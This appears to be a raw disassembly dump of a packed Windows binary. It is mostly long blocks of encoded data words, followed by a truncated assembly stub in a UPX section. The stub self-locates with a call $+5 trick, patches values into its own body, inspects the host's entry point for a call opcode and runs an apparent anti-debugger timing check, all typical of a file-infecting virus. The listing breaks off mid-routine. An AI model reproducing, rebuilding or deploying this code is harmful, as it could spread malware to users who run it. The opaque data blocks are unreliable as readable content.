5111D1C0h, 5111D091h, 0A6D57F91h, 0E840B6FBh dd 4080CBh, 5205D395h, 446EB2F3h, 0FF40CC8Ch, 367B2A55h dd 4A68C0h, 733780C0h, 6E29F2B0h, 1E6B4h, 52D57F90h, 8940B6FBh dd 367BDA45h, 8D718FC0h, 3659F14Dh, 60C509C0h, 5140B6FCh dd 3BEA153Fh, 68D380F6h, 4080C4h, 193E354Dh, 8D1980F6h dd 367CC67Dh, 0F5EF68C0h, 0C7267F3Fh, 365EEA45h, 831080C0h dd 365EEC65h, 95CD80C0h, 769EEAh, 12AD490h, 681280AAh dd 804080C2h, 3C0A153Fh, 0C0C580F6h, 8D62F59Ah, 365EDD4Dh dd 62AD2C0h, 1E2A354Dh, 561480F6h, 5211D090h, 3C0E153Fh dd 0FF1880F6h, 367CC655h, 67C546C0h, 40B6FEh, 408C28h dd 4F13D7C0h, 3273CB83h, 4C0CC4EEh, 0AAD57FC0h, 9340B6FBh dd 4087A8h, 0D5F50DC0h, 5940B6D8h, 3C563D4Dh, 2AA880F6h dd 0E8BF7F35h, 4080CCh, 490EC997h, 2E14C58Eh, 0CCC84h dd 3BEA153Fh, 0C0C580F6h, 27504CFh, 68D380C0h, 4080C5h dd 1953354Dh, 8D1980F6h, 367CB27Dh, 0F4B368C0h, 0BDC37F3Fh dd 76BCF6h, 10C48FC0h, 814080C2h, 41102Ch, 128D4C0h, 0FF4080C1h dd 367C9655h, 908401C0h, 504080C1h, 2A544Bh, 36D57F92h dd 8540B6FCh, 0D35D900h, 5308A8h, 0CAD57FC0h, 0EB40B6FBh dd 6CFD0322h, 40B6DEh, 85CDA9B5h, 769EB0h, 22D57F90h, 8540B6FCh dd 89C48F00h, 8B4080C1h, 0CB8C80h, 85CFB03Fh, 769EACh dd 3E270506h, 6A4180F6h, 6A41EAC0h, 2ED57FC2h, 8340B6FCh dd 844F7F38h, 4081A0h, 68D50D53h, 6A40B6DEh, 0FF13D2D0h dd 367C9E55h, 0F8005C0h, 41C045h, 82FD0DC0h, 0B140B6DEh dd 0FA6968C8h, 94287F3Fh, 5E4080C0h, 34C966EBh, 95BFD4E4h dd 76BB62h, 1ED03D4Dh, 1F180F6h, 0FFBA8A28h, 7DD50D3Fh dd 6A40B6DEh, 54E8C0h, 531280C0h, 3C6A153Fh, 44CD80F6h dd 95CD94E4h, 76C0C4h, 0AF68F90h, 1464C44Bh, 2486001h dd 4A52818Ah, 30A92C2h, 864C4CBh, 0C14F6140h, 0B118820h dd 0FF50A484h, 0BDCDD0F2h, 76BCA8h, 409C28h, 366EA5C0h dd 206EA0B8h, 257AA0EEh, 386EA5E5h, 2038A5B8h, 4A4AF3E5h dd 200EC98Fh, 95BFD7C0h, 76BB9Ah, 0EC4441h, 2A80C0h, 0FF13D790h dd 367CAA55h, 84CD0BC0h, 6A40B6D5h, 6B5B63C0h, 0E8118D09h dd 4080C5h, 0A24A5E6h, 95BFD7C0h, 76BB9Ah, 504C4443h, 7288B2Bh dd 8D4080C0h, 365E167Dh, 0FF13D7C0h, 367CAA55h, 7E8005C0h dd 68F50D94h, 8340B6FCh, 36550465h, 8DCD80C0h, 76BEA7h dd 2A4EEBh, 0FF13D691h, 367CA655h, 0B803C0h, 8BD1AFBEh dd 68F50D3Eh, 0B040B6FCh, 75EE72CDh, 17A8E0D0h, 61BF7F3Ah dd 9A397B2h, 0EB41F74Dh, 2B8F0B2Ah, 68FD0D0Eh, 0F340B6FCh dd 0EBB70764h, 95BFD379h, 76BCDAh, 152B3D40h, 744180F6h dd 7570E8EAh, 95BF80C0h, 76BB0Ah, 3E273D40h, 744080F6h dd 6CC547D1h, 40B6DEh, 0C64080C0h, 367EE745h, 8A980C0h dd 0C7BF7F3Eh, 3655F445h, 4080C0h, 482DD40h, 4F4A8DC0h dd 6F2FEEE0h, 662FA0AEh, 6629ECE0h, 4F60A1A5h, 6D29F4E0h dd 6F34A0A5h, 6C25E3E0h, 6132E2A5h, 0D61E5B4h, 2060A0CAh dd 200FA0E0h, 6D2DF5B3h, 6760F2A5h, 6524F2A1h, 0A4DA1AEh dd 652CE592h, 652CF4AEh, 792CF3B3h, 7021E8E0h, 6160F9B0h dd 6560E4AEh, 6325F0B8h, 742EE1B4h, 7433A0ECh, 6924EEA1h dd 207AE7AEh, 574A8DEDh, 6823F4A1h, 2027EEA9h, 202CECA1h dd 2039E1A4h, 2024EEA1h, 6827E9AEh, 6660ACB4h, 6660F2AFh dd 6E25E9B2h, 4960F3A4h, 6921F7E0h, 0A4DBAB4h, 7225E897h dd 7221A0A5h, 6F39A0A5h, 6660ACB5h, 6E25E9B2h, 207FF3A4h dd 652DEF83h, 7409A0E1h, 2033E9E0h, 652DE9B4h, 7409A0E1h dd 6C60F3E7h, 2125F4A1h, 308704C4h, 4F94FAC3h, 0C728184Fh dd 4CE22168h, 10E694E9h, 602EFF6Fh, 0C8DF4CC0h, 0C22C4C9Ch dd 0D8F83392h, 0B962E410h, 1E23C3E0h, 15h dup(4080C0h) dd 0D4E503A0h, 40B6FFh, 3F982543h, 0F4080F6h, 8D54C377h dd 0B74F9893h, 0D043868Bh, 2464C44Bh, 724CC2EBh, 802BBD9h dd 42CB94B3h, 0C02ABD4h, 3F941549h, 85C980F6h, 76BF18h dd 0C2C3852Bh, 619962E8h, 88408402h, 3664E645h, 2468C0h dd 202880C0h, 8D4080C0h, 36631345h, 1879D9C0h, 0C0C38CB4h dd 0FFB762C4h, 367F3445h, 0D9B743C0h, 24260DC3h, 10A380F6h dd 8FBCF03Fh, 4A803C0h, 9DC97622h, 76A353h, 7440BA43h dd 372ABC5h, 4ECD90B2h, 5E1BD83Ch, 7440BA43h, 0EB727FC4h dd 10327FC3h, 0FFBFD728h, 2B8EAB3Fh, 367F584Dh, 4B43D8C0h dd 85CF43F4h, 76BF78h, 3FF40507h, 4080F6h, 3CA880C0h, 8B4080C0h dd 367F3445h, 0F6D668C0h, 18A87F3Fh, 834080C0h, 367F347Dh dd 83580C0h, 244F1D49h, 9CAB80F6h, 3FF40D3Fh, 8F8380F6h dd 367F3845h, 0B4D509C0h, 0E840B6FFh, 4080C3h, 8B8349F3h dd 400053h, 0EDA8D2C0h, 3BF7F3Eh, 367F5855h, 839683C0h dd 0F408CBAh, 418744h, 103A03C0h, 0FDC48FC0h, 8B4080C0h dd 0E8108C82h, 0FFBF7E08h, 3F9805C3h, 0C64380F6h, 80480A90h dd 19348039h, 746E7940h, 0F1ABC0C3h, 8141C84Bh, 0DF9F5F21h dd 44B9011Fh, 7540CC8Ch, 0C86BD92Ch, 0FBA7943h, 40374Fh dd 78C1E6C0h, 0F72B33Eh, 402B45h, 3AC3D6C0h, 8B45F5C0h dd 2AB908Ah, 0F1438A4Bh, 0FE326891h, 0B5437F3Fh, 76BF18h dd 7880056Dh, 84C48F3Bh, 0FF4080C0h, 367F5875h, 55A8D0C0h dd 3BF7F3Eh, 367F5845h, 0D8C50FC0h, 340B6FFh, 8313A4C4h dd 0DB738200h, 0E34836CFh, 208900D2h, 24644193h, 245CA9C4h dd 5B648CE9h, 81A96B80h, 0BB978F3Bh, 817EF41Dh, 6E05283Bh dd 8176F41Bh, 0A17BD93Bh, 816EF43Fh, 0B562563Bh, 8166F46Ch dd 58A9133Bh, 815EF433h, 58A9FD3Bh, 8156F433h, 257FC63Bh dd 814EF421h, 257FB03Bh, 0FF46F421h, 367F3855h, 71A9DBC0h dd 5EBF7F3Fh, 0E9544243h, 0FFBF7E2Fh, 42A8003h, 0F5766898h dd 95C87F3Fh, 76A680h, 187138A6h, 0E48062C2h, 66A282C3h dd 5846EA6Bh, 0FFB59B28h, 882033Fh, 52A5147h, 0F54E6898h dd 0FAC07F3Fh, 0B04BF3C3h, 40C58290h, 0AA40B6E6h, 682AA72Bh dd 0FAC02A98h, 0B058F5C3h, 0F4AE68D1h, 1F87F3Fh, 844080C0h dd 0D14DF412h, 0EB8A7E20h, 0B8456B36h, 804080C0h, 0C3FF626Bh dd 38F0154Dh, 0D76B80F6h, 0F7835A37h, 36782545h, 4080C0h dd 0C0D58FC8h, 0F64B6001h, 36782345h, 63581C0h, 25C98DA6h dd 85B6932Bh, 76B863h, 6646F5C2h, 0EB65B1CDh, 14DE6C4h dd 0E8EBE6E5h, 0FFBF7F7Ch, 8974C34Bh, 367F4C55h, 0F7832BC0h dd 36782545h, 4080C0h, 0C0D58FC8h, 0E8EA3CC4h, 0FFBF7F5Ch dd 3F901549h, 85B680F6h, 76B863h, 0F44F5C1h, 2B426BF1h dd 0F7832B00h, 36782545h, 4080C0h, 8A67F4C8h, 36781F45h dd 0BA041C0h, 45CB8DA6h, 0F8F02BA6h, 9FC50A6Ah, 0C140B6F8h dd 67459B20h, 0AB4609A4h, 0AB2640F3h, 64F8922Bh, 0AB40854Fh dd 38DF054Ah, 584480F6h, 0AB586001h, 0EBBC3003h, 0EBF8E6E0h dd 0EBEBE6C0h, 5844EAD9h, 0FFB37F28h, 0D2440D3Fh, 66486001h dd 668009C5h, 0B0436B6Bh, 22A2A50h, 0F3A66898h, 0D2C47F3Fh dd 82AB2B4h, 0F39A6898h, 0CABE7F3Fh, 0C53443B2h, 0C9344A3Eh dd 0DB344A3Eh, 3 dup(0C344A3Eh), 0CDAB7970h, 0C9AB7D70h dd 0C5AB7570h, 0C1AB7870h, 0B0FD0D03h, 0F740B6F8h, 36782545h dd 4080C0h, 0B043F440h, 85B72AA0h, 76B865h, 84080C0h, 55F887B4h dd 0AB406C4Bh, 0A5C5778Fh, 340B6F8h, 0F4180C0h, 405744h dd 0AAA830C0h, 0BCFD096Bh, 0B040B6FFh, 89EB2A28h, 367F407Dh dd 0A5C577C0h, 340B6F8h, 744080C0h, 0A5C577D5h, 40B6F8h dd 744180C0h, 0FE8168C5h, 0E9F07F3Fh, 85CB2B6Ah, 76BF7Ch dd 0C86B4F4Bh, 3F843D49h, 48C980F6h, 6427383Ch, 33EBB63Fh dd 0F7EBE600h, 36782545h, 4083C0h, 0F64EF4C0h, 36782345h dd 53400C0h, 0FFBEC228h, 6427383Fh, 33EBA649h, 0F7EBE600h dd 36782545h, 4083C0h, 0F615F4C0h, 36782345h, 53500C0h dd 0FFBE9E28h, 0FDE4683Fh, 20F07F3Fh, 0FFBB3628h, 6679633Fh dd 66557F78h, 8BEB116Bh, 36782555h, 0F79277C0h, 408302h dd 0E854F5C0h, 0FFBF7DBEh, 90A89F70h, 66BF7F3Bh, 66557F78h dd 8BEB116Bh, 0C4C50B0Fh, 2B40B6FFh, 0FC080908h, 38E50537h dd 4380F6h, 2E3480C0h, 38E50537h, 4080F6h, 223486C0h, 38E50537h dd 4080F6h, 53581C0h, 0FFBD7228h, 0A5C5773Fh, 40B6F8h dd 744480C0h, 0FE4D68C5h, 85B77F3Fh, 76B865h, 4080C4h dd 67A897B4h, 0B8BF7F3Eh, 0C8BE40E9h, 0C048386Bh, 0B8EB84B4h dd 67AB78B5h, 0A5C5776Bh, 840B6F8h, 754080C0h, 0A3FD008Fh dd 40B6F8h, 3BA8C6B4h, 0B8BF7F3Eh, 0C96998E9h, 38DF25CAh dd 0E48080F6h, 9FE58AC3h, 0AB40B6F8h, 8AEA3170h, 36782345h dd 40F02AC0h, 38DF05CAh, 66EA80F6h, 0F7BD6278h, 36782545h dd 4090C0h, 0B047F4C0h, 0B8262A89h, 0AB267CB5h, 33EA6870h dd 0BDC92B00h, 76BF68h, 38E50537h, 6080F6h, 93580C0h, 854AD870h dd 76B85Dh, 81F8E66Ah, 0A5C57700h, 4040B6F8h, 744080C0h dd 288400C3h, 38DD25CAh, 0AB2680F6h, 3FEC3D49h, 0F7EB80F6h dd 36782545h, 4080C0h, 0B049F580h, 9DC58290h, 0AA40B6F8h dd 38E50537h, 0C080F6h, 0B3580C0h, 854A3870h, 76B85Eh dd 667D6B6Ah, 0F758B178h, 36782545h, 4180C0h, 0B042F4C0h dd 9EE58AE9h, 0C040B6F8h, 0A54A8324h, 76B85Eh, 0B8262BA6h dd 85B77041h, 76B865h, 4082C0h, 0C8F482B5h, 38DE25CAh dd 0AB2680F6h, 3F883D49h, 0B0F880F6h, 0AB4080E8h, 38E50537h dd 4880F6h, 713480C0h, 0FFBDB128h, 0A5C5773Fh, 40B6F8h dd 754080C4h, 0AF830CBh, 36781F45h, 4DAB2AC0h, 38E50537h dd 84080F6h, 113580C0h, 0E0C338A6h, 38DF25CAh, 0AB2680F6h dd 0EBEA40F3h, 29F8E6D5h, 9FE58AD8h, 0C040B6F8h, 0A54A8324h dd 76B85Fh, 85B72BA6h, 76B865h, 4090C0h, 0C0C138A6h, 0C4C083B4h dd 9FE58AC8h, 6640B6F8h, 85F68F6Bh, 76B863h, 0FC80686Bh dd 85B77F3Fh, 76B865h, 404080C0h, 50F089B4h dd 38DD05C2h, 0F7EA80F6h, 36782545h, 6080C0h, 75C630C0h dd 8D4484C2h, 0A5CA7E8Fh, 76B85Dh, 3FF00D49h, 0AB2680F6h dd 75457C40h, 804030C7h, 0AA007F8Fh, 0FFBCF928h, 0A5C5773Fh dd 40B6F8h, 66408080h, 7571E678h, 666934C2h, 0A58306Bh dd 36781F45h, 3A040C0h, 0FC14686Ah, 88F07F3Fh, 38E50537h dd 804080F6h, 23580C0h, 0A5CA0670h, 76B85Dh, 0FCC02BA6h dd 0B047F5C5h, 0FF0F00C0h, 2BA82A80h, 0F7BF7F3Ch, 36782545h dd 14080C0h, 0B04BF5C0h, 9DC58A80h, 0AA40B6F8h, 0B8268F2Bh dd 0A54A4043h, 76B85Dh, 1F02BA6h, 0A5C5776Ah, 40B6F8h dd 754082C0h, 0A5C577EFh, 40B6F8h, 754084C0h, 0A8030DAh dd 36781F45h, 0A4E50AC0h, 0C140B6F8h, 0B8269020h, 0B0EB01A6h dd 0B0486BC0h, 9FC58A80h, 0AA40B6F8h, 38E50537h, 4080F6h dd 103580C8h, 0E8C338A6h, 38DE25CAh, 0AB2680F6h, 8AB8170h dd 854AC870h, 76B85Eh, 0A5C5776Ah, 40B6F8h, 0B14090C0h dd 6665F5B5h, 0AB80378h, 36781E65h, 33EBE6C0h, 0BD692A00h dd 76BF70h, 38E50537h, 4080F6h, 1F3580E0h, 1BABF771h, 184938A6h dd 38DE25CAh, 0E48080F6h, 9EE58AC3h, 6640B6F8h, 0B0FDA96Bh dd 8A40B6FFh, 0B0E50A01h, 6640B6FFh, 218306Bh, 36781D45h dd 85B72AC0h, 76B865h, 14080C3h, 85B7A2B4h, 76B865h, 44080C0h dd 85B796B5h, 76B865h, 34080C0h, 84A885B5h, 0E8BF7F3Ah dd 0FFBF7A6Bh, 38E50537h, 4080F6h, 33488C0h, 0F7EA4970h dd 36782545h, 4080C0h, 0B060F440h, 9DC5AAC7h, 0C140B6F8h dd 894D9A20h, 240A4C8h, 36781D65h, 3A440C0h, 0AB444440h dd 66EAE170h, 0AA07F78h, 36781D65h, 0F7EBE6C0h, 36782545h dd 40A0C0h, 0F713F4C0h, 36782545h, 4080C0h, 0F74DF4E0h dd 408307h, 0B045F4C0h, 0F3AB2A50h, 8DCB474Bh, 76BF68h dd 41C941EBh, 0A18303Ch, 36781D45h, 85B72AC0h, 76B865h dd 80C0h, 0B8268CB4h, 854A4390h, 76B85Dh, 0B8268A2Bh, 0A54A603Fh dd 76B85Dh, 85B72BA6h, 76B865h, 14080C3h, 85B7F3B4h, 76B865h dd 204080C0h, 0C7B78DB4h, 4080C3h, 90F085B4h, 8BB36B6Ah dd 0C0C50B0Fh, 2B40B6FFh, 0FC080908h, 85B749F3h, 76B865h dd 0C080C0h, 85CD8EB5h, 76B85Dh, 8000884Ah, 0F8338339h dd 448D844Dh, 0C14090E4h, 8BF08820h, 6646636Bh, 6680B178h dd 8FF8E66Bh, 0F8E840h, 0E14280C0h, 0AB182BA6h, 6354945h dd 0C07138A6h, 0C3F02BA6h, 0B0C50D6Ah, 0F740B6F8h, 36782545h dd 4080C0h, 5746F5D0h, 0EB1878EBh, 28130BD9h, 0D06B78EBh dd 3F880D4Bh, 954180F6h, 76BF68h, 44CBB9C1h, 0BDC984E4h dd 7690A7h, 3FEC3D4Bh, 856B80F6h, 76BF68h, 38E50537h, 80F6h dd 23480C0h, 0C2EB5837h, 571680C4h, 3FA03D43h, 0F4080F6h dd 415944h, 4D68C0h, 450B80C0h, 4C05CE92h, 446EB2F3h, 0FF40CC8Ch dd 367B1255h, 0F4C509C0h, 5340B6FFh, 37CD84Bh, 28337F18h dd 0E874C34Bh, 0FFBF7520h, 3F94154Bh, 31B80F6h, 85C98C82h dd 76BF38h, 8948C2C3h, 367F7C45h, 28330BC0h, 0C0333Fh dd 0B9A880C0h, 8BBF7F35h, 367F547Dh, 0ADA8D6C0h, 8BBF7F35h dd 367F5455h, 80A0BC0h, 2B4CCAC3h, 5A9030Eh, 12008CFh dd 844F80C0h, 40819Ah, 3F9835C3h, 0B54380F6h, 76BF58h dd 0FA8BC6Ch, 402245h, 4060DC0h, 3FD805EBh, 64380F6h, 0F52A6890h dd 0BDC37F3Fh, 76BF14h, 3B4BF5C0h, 834F8C87h, 4081DBh dd 95798C2Bh, 76BF14h, 14D05CFh, 854380C0h, 76BF58h, 0FF7801A6h dd 0FCC58FE5h, 8B4080C0h, 436B8280h, 2DA8D0F4h, 39BF7F35h dd 367F547Dh, 0E4C58FC0h, 34080C0h, 367F5845h, 98C583C0h dd 8B40B6FFh, 0C07ABC0h, 8D02CFh, 477B80C0h, 0C4C38FC8h dd 834080C0h, 47438200h, 98C583D4h, 5240B6FFh, 0F4F57F90h dd 0FF40B6FFh, 367BD255h, 0C0C5DAC0h, 0F705CFh, 9CA980C0h dd 3C4080C0h, 94C58F3Fh, 804080C0h, 854F95FEh, 40804Bh dd 2B41C64Bh, 0E810B483h, 0FFBF747Ch, 3F943DF9h, 773580F6h dd 3F9805C3h, 854380F6h, 76BF58h, 40400549h, 0CB80F6h dd 3FB805FBh, 83280F6h, 3FBC05FBh, 693280F6h, 4080FDh dd 0E877F2B0h, 4080DFh, 8BBCCE4Dh, 342AB01h, 857B9082h dd 76C0C0h, 0C4C38CB5h, 8F717FD0h, 615CA484h, 8F839B2Bh dd 367F3845h, 0B5CBE0C0h, 76BF58h, 0FFB5DA28h, 0E9E13Fh dd 75C080C0h, 0C07ABCEh, 477B89B2h, 3CC28FC8h, 49BF7F3Fh dd 0FEF205CFh, 3CCB7F3Fh, 0A5E701E4h, 0FF4080E8h, 0EB3F7F3Fh dd 240A0182h, 0E04080A0h, 8B80B38Eh, 85C7A4CCh, 76BF20h dd 3F9C0549h, 0B9CD80F6h, 40A869h, 3FD805C3h, 0A52680F6h dd 0C66BCE65h, 2B54C2C3h, 46868C82h, 8187683Bh, 408092h dd 4080C5h, 5FBCC649h, 0FF17439Eh, 367B1E55h, 1FA841C0h dd 15A05CFh, 541080C0h, 0FF2AA8AAh, 3BBE153Fh, 0C0C580F6h dd 5C88F9Fh, 0E84080C1h, 0FFBF6580h, 409128h, 7425D3C0h dd 652CE986h, 7523E593h, 7934E9B2h, 0B5BF8081h, 76BFACh dd 3B12153Fh, 85C980F6h, 76BFB4h, 409928h, 5425D3C0h, 4F25EBA1h dd 7225EEB7h, 7029E8B3h, 7629F290h, 6725ECA9h, 0E81780A5h dd 0FFBF69D1h, 409328h, 5225D3C0h, 6F34F3A5h, 7210E5B2h dd 6C29F6A9h, 25E7A5h, 0E8B36897h, 12A87F3Fh, 534080C0h dd 6321C2A5h, 5030F5ABh, 6936E9B2h, 6527E5ACh, 0D6A8D7C0h dd 0E8BF7F28h, 4080D8h, 6803E593h, 6527EEA1h, 6934EF8Eh dd 7210F9A6h, 6C29F6A9h, 25E7A5h, 0E8F36897h, 54107F3Fh dd 3AF0054Dh, 642A80F6h, 5741EA90h, 3C4A153Fh, 3CC980F6h dd 46D57FE4h, 2A40B6FBh, 68FD0D00h, 5040B6FEh, 0B5BFD090h dd 76BA70h, 44081A8h, 12AD4C0h, 74D57F97h, 5440B6FFh, 0FF1784AAh dd 367FF455h, 148403C0h, 3F2C353Fh, 95BF80F6h, 76BB42h dd 0B5CD439Fh, 76BEA8h, 86D57F96h, 8340B6FBh, 844F7F38h dd 40807Bh, 3F380549h, 2A80F6h, 0C2D57F96h, 8540B6FBh dd 0A4C48F00h, 2B4080C0h, 6A10D000h, 12AD0C3h, 4080A8h dd 95BFD600h, 76BBA2h, 0FBF7843h, 456844h, 7CC509C0h, 8D40B6FFh dd 367F004Dh, 88D50DC0h, 5140B6FFh, 5040EA92h, 3BCE153Fh dd 0F8C380F6h, 0B6C48F3Fh, 6A4080C5h, 7CF57FC0h, 0FF40B6FFh dd 367B0A55h, 0FFB803C0h, 5DF04CFh, 85C980C0h, 76BF50h dd 0C34349F3h, 6A11D091h, 0B5BFD1C4h, 76BFBCh, 3B26153Fh dd 0C0C580F6h, 53B04CFh, 0C97380C0h, 3FD40549h, 511180F6h dd 5FE891h, 0FF1080CFh, 367B2E55h, 0F8005C0h, 45B444h dd 98C509C0h, 0C340B6FFh, 308878h, 380B0BC0h, 38E50537h dd 4080F6h, 63590C0h, 102705C3h, 0D27380F6h, 0F1B741C3h dd 85C96137h, 76BF64h, 682F78h, 3C0B0BC0h, 102705C3h, 0D27380F6h dd 0F1B741C3h, 85C96137h, 76BF5Ch, 4BF78F03h, 35A379C6h dd 0F58D34Dh, 354C377h, 0C12BC910h, 819083E8h, 6937DFFAh dd 1D3479AEh, 14CFA43h, 4BCB60B2h, 14020BFCh, 8D50C2C3h dd 0F7BFC884h, 3B81A319h, 367F1045h, 54CB43C0h, 0C07390E4h dd 0F8024Fh, 8B8380C0h, 8D4B6B0Fh, 367EE87Dh, 0DFCB7CC0h dd 3CEC49F3h, 3C46F2A1h, 2C42F7BAh, 5C7C2AE0h, 2E7C6CB4h dd 7C5DB4h, 0C9A368B5h, 457D814Bh, 7440C598h, 4313BDCBh dd 854F8092h, 0FFBF7FF3h, 577D834Bh, 0F03CE89h, 0FFBFA644h dd 4317BD3Fh, 844FCE95h, 0FFBF7FDBh, 3303D7FDh, 10C48FF2h dd 3DBF7F3Fh, 4F14D390h, 0FF4504CFh, 0DB737F3Fh, 0FFBEAD28h dd 0E850F53Fh, 0FFBF7C3Ah, 0FFBEA128h, 0ECC48F3Fh, 33BF7F3Eh dd 566812h, 63A880C0h, 0E8BF7F3Fh, 4080C0h, 53AD019Dh dd 0E940B6F3h, 40831Bh, 8B727FA4h, 367F1875h, 22C9E4C0h dd 4D7E01A6h, 0C4C58F9Ah, 8B4080C3h, 0DE43BC9Eh, 507B01A6h dd 0B4C58F85h, 0F74080C3h, 20409683h, 854F80C0h, 408367h dd 21CC336h, 3DD04CFh, 43CB80C0h, 0A0E0BDC8h, 844F2060h dd 40834Fh, 2060A0FDh, 84C48FE0h, 0E84080C3h, 0FFBF7E79h dd 33902CFh, 0A5C380C0h, 76BF1Ch, 8020BC0h, 2B50CA4Bh dd 3344F301h, 3456B00h, 100A0908h, 3FE00549h, 4A4380F6h dd 4038CCh, 0E81180C1h, 0FFBF6750h, 38E315F0h, 20F180F6h dd 38E435F0h, 202A80F6h, 7818493Eh, 0E73668D4h, 0D2C57F3Fh dd 0D38214CFh, 0A5D5B122h, 0EB40B6F8h, 0A5C57725h, 40B6F8h dd 744180C0h, 0A5C577E2h, 340B6F8h, 754080C0h, 0A5E501CCh dd 0FF40B6F8h, 0EBBB7F3Fh, 0A5CD01CAh, 40B6F8h, 684880C0h dd 4080C6h, 46E899h, 0E81880C0h, 0FFBF67E8h, 38DD054Ah dd 84C680F6h, 36781DEAh, 9DC508C0h, 0E240B6F8h, 0A5C57720h dd 840B6F8h, 754080C0h, 9FFD00C9h, 140B6F8h, 85B745B4h dd 76B865h, 84080C0h, 0BDC09BB4h, 76B85Dh, 80F0F4C5h, 36781E7Dh dd 0A73485C0h, 38DF3D40h, 744580F6h, 0A5C5775Eh, 40B6F8h dd 74C080C0h, 9DFD00C9h, 240B6F8h, 0A5C309B7h, 76BF20h dd 0F34768C0h, 61A87F3Fh, 0E8BF7F3Dh, 4082B0h, 3FDC1D4Bh dd 9D4380F6h, 76BF60h, 0FFBCF928h, 50C48F3Fh, 8B4080C2h dd 367F1875h, 3C1E0BC0h, 7AA85EC3h, 0FBF7F3Dh, 42BA42h dd 240A01C0h, 0E04080A0h, 56127E4Bh, 354FAC3h, 85B790BAh dd 76B865h, 104080C0h, 0BDC994B5h, 76BF24h, 38F0354Dh dd 8DCB80F6h, 7690A7h, 0B9172433h, 408AECh, 1040354Dh dd 0A5B380F6h, 2A38071h, 85B72433h, 76B865h, 104080C0h dd 0EE04CFh, 73BF80C0h, 0EEF668E8h, 95CB7F3Fh, 76BF14h dd 844F5245h, 408058h, 3FD8354Bh, 4ACB80F6h, 240A01D0h dd 0E04080A0h, 7348CAEBh, 389B3C2h, 8D7B94B2h, 7690A7h dd 10270D4Bh, 563280F6h, 8364BC4Bh, 3650E765h, 0A7C380C0h dd 4080A7h, 83A0BC0h, 348CAC1h, 8BB70737h, 367F2C45h, 0A5C577C0h dd 4040B6F8h, 744080C0h, 35877C2h, 30698CB2h, 3FA03549h dd 73CB80F6h, 0F77081E8h, 36782545h, 40C0C0h, 0F742F4C0h dd 49A8D1D8h, 59BF7F3Ch, 73438C2Bh, 0C32ABE8h, 0A4B3D691h dd 0B5CDD99Fh, 76B870h, 3FA43D49h, 0A4B380F6h, 314FDE9Fh dd 0D3C70D52h, 3A4080C0h, 36782355h, 6946F5C0h, 3416F812h dd 0F01008D2h, 0FF9A2028h, 4ACBDA3Fh, 100A83CCh, 38E50537h dd 4080F6h, 41CD90C0h, 8953F5C5h, 367F604Dh, 67C583C0h dd 8340B6D0h, 40E767h, 436B80C0h, 52C709E8h, 0F74080C0h dd 367CE045h, 4081C0h, 0C747F4C0h, 0A0E08883h, 85B72060h dd 76B865h, 804080C0h, 0E81287B4h, 0FFBF77BAh, 0E0CD0B9Ah dd 0E340B6FFh, 280B09C5h, 8DCB8D2Bh, 76BF1Ch, 3AB8223h dd 0F768CB4Bh, 36782545h, 4083C0h, 8B54F4C0h, 367F6445h dd 0D0CD83C0h, 340B6FFh, 367F4C45h, 8B4881C0h, 85CB908Ah dd 76BF5Ch, 7348CAF9h, 80A09C3h, 8350C2C1h, 8B40D8A3h dd 367F2445h, 28F0E8C0h, 424180C0h, 4341D9C8h, 0A3D50A90h dd 0F740B6F8h, 36782545h, 4080C0h, 346F4D0h, 3650E74Dh dd 0F74036C0h, 36782545h, 24080C0h, 0FE54F5C0h, 0A5C57706h dd 40B6F8h, 754084C0h, 0A4F50AC6h, 0F740B6F8h, 36782545h dd 80C0h, 8A4BF5C0h, 0AA8282C7h, 0F7A256C2h, 7CA892Bh dd 2EA42F2h, 33B76216h, 22CBE412h, 58420FA4h, 3F3C3D43h dd 0F4080F6h, 0FFBA5E44h, 98F57F3Fh, 0FF40B6FFh, 367B5255h dd 94F57FC0h, 0FF40B6FFh, 367BC655h, 80CD0DC0h, 8D40B6FFh dd 367F0855h, 6A12D1C0h, 7CF57FC0h, 0FF40B6FFh, 367B4655h dd 7CF57FC0h, 0FF40B6FFh, 367BC655h, 68F50DC0h, 0FF40B6FEh dd 367FF875h, 95BFD6C0h, 76BB02h, 3F3C2543h, 0C34080F6h dd 408028h, 12ADDC0h, 37F06D41h, 0F01880F6h, 74C541CFh dd 8540B6D5h, 0C8C34300h, 0C14F703Fh, 3655F445h, 107D43C0h dd 7540AAC0h, 7CC1E6DCh, 712C8CE4h, 0E82093B5h, 0FFBF7F04h dd 0D4A885B5h, 0E8BF7F3Ah, 0FFBF7F12h, 2DBFAEA1h, 1274D6B8h dd 40A578h, 0A5A8E0C0h, 75BF7F3Fh, 24040BF9h, 68F50DF0h dd 8B40B6FEh, 81268890h, 734286FAh, 28D6E5h, 8B407FC0h dd 5240EA04h, 12D57F90h, 8340B6FCh, 3EC18804h, 5C7FBF9Ch dd 0C6C383B5h, 0FAC168C4h, 7FA87F3Fh, 61BF7F3Fh, 343803h dd 0B1AB80C0h, 40AF78h, 5D68C0h, 208280C0h, 7038C0h, 10A880C0h dd 0C24080C0h, 85F880E4h, 0E84080C1h, 4080C3h, 8D40AC02h dd 0CD4CA494h, 0B803EEh, 0E82099BCh, 4080C0h, 3064D44Bh dd 815A0B9Dh, 3678072Dh, 0E1FA68C0h, 0C2217F3Fh, 24380C4h dd 14785C6h, 83FE9443h, 15FF66ADh, 441244h, 90h, 1CDh dup(0) dd 4420AD00h, 31h, 13D9h dup(0) ; --------------------------------------------------------------------------- loc_3144A000: ; DATA XREF: UPX2:3144CFE8o call $+5 mov eax, [esp] cld mov [eax+2FE3h], ebx test dword ptr [eax+28A0h], 80000000h mov ebx, [esp+4] jz short loc_3144A04B pop ecx mov [eax+2FE7h], esi mov [eax+2FEBh], edi cmp byte ptr [eax+28A4h], 0E8h jnz short loc_3144A042 add ebx, [eax+28A5h] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_3144A04A ; --------------------------------------------------------------------------- loc_3144A042: ; CODE XREF: UPX2:3144A033j mov ebx, [eax+28A6h] push dword ptr [ebx] loc_3144A04A: ; CODE XREF: UPX2:3144A040j pop ebx loc_3144A04B: ; CODE XREF: UPX2:3144A01Dj push ebp mov ebp, eax sub dword ptr [esp+4], 8005h sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+3638B0h] mov ecx, 0A9h rep movsb call sub_3144A0C0 mov ecx, eax call sub_3144A0C0 sub eax, ecx jz short loc_3144A094 cmp eax, 100h ja short loc_3144A094 lea eax, [ebp+3610D3h] mov dl, [eax-10h] ; CODE XREF: UPX2:3144A0D5j call sub_3144A0C4 jmp short loc_3144A0D3 ; --------------------------------------------------------------------------- loc_3144A094: ; CODE XREF: UPX2:3144A07Bj ; 